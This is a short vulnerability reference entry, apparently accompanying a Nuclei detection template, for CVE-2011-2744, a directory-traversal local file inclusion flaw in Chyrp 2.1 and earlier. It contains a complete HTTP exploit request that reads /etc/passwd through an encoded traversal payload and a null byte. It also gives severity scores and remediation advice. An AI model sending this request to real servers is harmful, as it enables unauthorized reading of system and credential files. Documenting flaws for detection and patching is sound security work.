| Title | Chyrp 2.x - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. |
| Remediation | Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor. |
| CVSS Score | 6.8 |
| EPSS Score | 0.05641 |
| CVE ID | CVE-2011-2744 |
| CWE ID | CWE-22 |
| Tags | cve cve2011 lfi chyrp edb vuln |
A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-2744.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-2744.pcap
N/AN/A